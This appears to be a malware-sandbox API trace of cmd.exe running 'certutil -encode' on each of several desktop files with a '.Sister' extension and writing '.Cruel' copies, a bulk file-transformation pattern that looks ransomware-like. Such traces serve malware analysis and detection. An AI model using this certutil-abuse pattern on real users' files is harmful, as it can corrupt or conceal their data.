[0235.949] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0235.949] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0235.949] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0235.949] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0235.949] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0235.949] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0235.949] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0235.949] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0235.949] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0235.949] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0235.949] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0235.950] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0235.950] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0235.950] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0235.950] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0235.950] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0235.950] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0235.950] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.950] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.950] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.950] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.950] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.950] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.950] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.951] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.951] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0235.951] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0235.951] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0235.951] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0235.951] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0235.951] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0235.951] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0235.951] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0235.951] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0235.951] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0235.951] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0235.951] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0235.951] GetProcessHeap () returned 0x21ed8c70000 [0235.951] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e60) returned 1 [0235.951] GetProcessHeap () returned 0x21ed8c70000 [0235.951] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95980 [0235.951] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0235.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0235.951] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0235.952] _get_osfhandle (_FileHandle=0) returned 0x4c [0235.952] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0235.952] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"Mhg3G6nMJa5mU0.mp4.Sister\" \"Mhg3G6nMJa5mU0.mp4.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"Mhg3G6nMJa5mU0.mp4.Sister\" \"Mhg3G6nMJa5mU0.mp4.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"Mhg3G6nMJa5mU0.mp4.Sister\" \"Mhg3G6nMJa5mU0.mp4.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x1018, dwThreadId=0x4b4)) returned 1 [0235.962] CloseHandle (hObject=0xa8) returned 1 [0235.962] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0235.962] GetProcessHeap () returned 0x21ed8c70000 [0235.963] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0235.963] GetEnvironmentStringsW () returned 0x21ed9980080* [0235.963] GetProcessHeap () returned 0x21ed8c70000 [0235.963] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0235.963] FreeEnvironmentStringsA (penv="=") returned 1 [0235.963] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0237.736] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0237.736] CloseHandle (hObject=0xa4) returned 1 [0237.736] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0237.737] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0237.737] GetProcessHeap () returned 0x21ed8c70000 [0237.737] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0237.737] GetEnvironmentStringsW () returned 0x21ed9980080* [0237.737] GetProcessHeap () returned 0x21ed8c70000 [0237.737] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0237.737] FreeEnvironmentStringsA (penv="=") returned 1 [0237.737] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0237.737] GetProcessHeap () returned 0x21ed8c70000 [0237.737] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0237.737] GetEnvironmentStringsW () returned 0x21ed9980080* [0237.737] GetProcessHeap () returned 0x21ed8c70000 [0237.738] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0237.738] FreeEnvironmentStringsA (penv="=") returned 1 [0237.738] GetProcessHeap () returned 0x21ed8c70000 [0237.738] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95980) returned 1 [0237.738] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0237.738] ??_V@YAXPEAX@Z () returned 0x1 [0237.738] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1b28d70, ftCreationTime.dwHighDateTime=0x1d5f026, ftLastAccessTime.dwLowDateTime=0xd43ed340, ftLastAccessTime.dwHighDateTime=0x1d5f098, ftLastWriteTime.dwLowDateTime=0xd43ed340, ftLastWriteTime.dwHighDateTime=0x1d5f098, nFileSizeHigh=0x0, nFileSizeLow=0x12966, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="NbugXFY9poFh8.gif.Sister", cAlternateFileName="")) returned 1 [0237.738] GetProcessHeap () returned 0x21ed8c70000 [0237.738] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c78f20, Size=0x3c0) returned 0x21ed8c78f20 [0237.738] GetProcessHeap () returned 0x21ed8c70000 [0237.738] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c78f20) returned 0x3c0 [0237.738] GetProcessHeap () returned 0x21ed8c70000 [0237.738] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69280 [0237.738] GetProcessHeap () returned 0x21ed8c70000 [0237.738] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69280, Size=0x58) returned 0x21ed8d69280 [0237.740] GetProcessHeap () returned 0x21ed8c70000 [0237.740] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69280) returned 0x58 [0237.740] GetProcessHeap () returned 0x21ed8c70000 [0237.740] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d692f0 [0237.740] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0237.740] GetProcessHeap () returned 0x21ed8c70000 [0237.740] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bb70 [0237.740] ??_V@YAXPEAX@Z () returned 0x1 [0237.740] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0237.740] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0237.741] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0237.741] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0237.741] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0237.741] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb7e281eb, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb7e281eb, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cb80 [0237.741] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0237.742] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\NbugXFY9poFh8.gif.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1b28d70, ftCreationTime.dwHighDateTime=0x1d5f026, ftLastAccessTime.dwLowDateTime=0xd43ed340, ftLastAccessTime.dwHighDateTime=0x1d5f098, ftLastWriteTime.dwLowDateTime=0xd43ed340, ftLastWriteTime.dwHighDateTime=0x1d5f098, nFileSizeHigh=0x0, nFileSizeLow=0x12966, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="NbugXFY9poFh8.gif.Sister", cAlternateFileName="NBUGXF~1.SIS")) returned 0x21ed8c7cfa0 [0237.742] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0237.742] _wcsnicmp (_String1="NBUGXF~1.SIS", _String2="NbugXFY9poFh8.gif.Sister", _MaxCount=0x18) returned 5 [0237.742] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0237.742] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0237.742] GetProcessHeap () returned 0x21ed8c70000 [0237.742] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc89d0 [0237.742] ??_V@YAXPEAX@Z () returned 0x1 [0237.742] ??_V@YAXPEAX@Z () returned 0x1 [0237.742] GetProcessHeap () returned 0x21ed8c70000 [0237.742] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d692f0, Size=0x200) returned 0x21ed8d692f0 [0237.742] GetProcessHeap () returned 0x21ed8c70000 [0237.742] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d692f0) returned 0x200 [0237.742] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0237.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0237.742] GetFileType (hFile=0x50) returned 0x2 [0237.742] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0237.743] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0237.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0237.812] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0237.913] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0237.913] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0237.913] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0237.913] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0237.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0237.913] GetFileType (hFile=0x50) returned 0x2 [0237.913] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0237.913] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0237.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0237.984] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0238.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0238.249] GetFileType (hFile=0x50) returned 0x2 [0238.249] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0238.249] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0238.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0238.400] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d69290*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d69290*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0238.500] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"NbugXFY9poFh8.gif.Sister\" \"NbugXFY9poFh8.gif.Cruel\" ") returned 62 [0238.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0238.500] GetFileType (hFile=0x50) returned 0x2 [0238.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0238.500] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0238.570] _get_osfhandle (_FileHandle=1) returned 0x50 [0238.570] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x3e) returned 1 [0238.692] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0238.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0238.744] GetFileType (hFile=0x50) returned 0x2 [0238.744] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0238.744] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0238.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0238.825] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0238.916] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0238.989] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0238.989] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0238.989] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0238.989] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0238.991] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0238.991] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0238.991] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0238.991] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0238.992] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0238.992] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0238.992] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0238.992] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0238.992] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0238.992] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0238.992] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0238.992] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0238.992] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0238.992] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0238.992] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0238.993] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0238.993] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0238.993] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0238.993] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0238.995] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0238.995] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0238.995] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0238.995] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0238.995] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0238.995] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0238.995] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0238.995] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0238.995] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0238.995] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0238.995] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0238.995] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0238.996] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0238.996] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0238.996] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0238.996] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0238.996] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0238.997] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0238.997] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0238.997] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0238.998] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0238.998] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0238.998] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0238.998] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0238.998] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0238.998] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0238.998] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0238.998] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0238.998] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0238.998] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0238.998] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0238.999] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0238.999] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0238.999] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0238.999] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0238.999] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0238.999] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0239.000] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0239.001] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0239.001] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0239.001] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0239.001] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0239.001] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0239.001] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0239.001] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0239.001] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0239.001] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0239.001] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0239.002] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0239.002] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0239.002] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0239.002] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0239.002] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0239.002] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0239.002] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0239.004] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0239.004] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0239.004] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0239.004] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0239.004] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0239.004] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0239.004] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0239.004] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0239.004] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0239.005] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0239.005] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0239.005] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0239.005] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0239.005] ??_V@YAXPEAX@Z () returned 0x1 [0239.006] GetProcessHeap () returned 0x21ed8c70000 [0239.006] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92e12d0 [0239.006] GetProcessHeap () returned 0x21ed8c70000 [0239.006] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x9e) returned 0x21ed8d63a50 [0239.007] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0239.007] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0239.008] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0239.008] GetProcessHeap () returned 0x21ed8c70000 [0239.008] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed92f12c0 [0239.010] SetErrorMode (uMode=0x0) returned 0x0 [0239.010] SetErrorMode (uMode=0x1) returned 0x0 [0239.011] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed92f12d0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0239.011] SetErrorMode (uMode=0x0) returned 0x1 [0239.011] GetProcessHeap () returned 0x21ed8c70000 [0239.011] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92f12c0, Size=0x52) returned 0x21ed92f12c0 [0239.011] GetProcessHeap () returned 0x21ed8c70000 [0239.012] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92f12c0) returned 0x52 [0239.012] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0239.012] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0239.012] GetProcessHeap () returned 0x21ed8c70000 [0239.012] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5e7c0 [0239.012] GetProcessHeap () returned 0x21ed8c70000 [0239.012] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed9980080 [0239.013] GetProcessHeap () returned 0x21ed8c70000 [0239.013] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980080, Size=0x1be) returned 0x21ed9980080 [0239.013] GetProcessHeap () returned 0x21ed8c70000 [0239.013] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980080) returned 0x1be [0239.013] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0239.013] 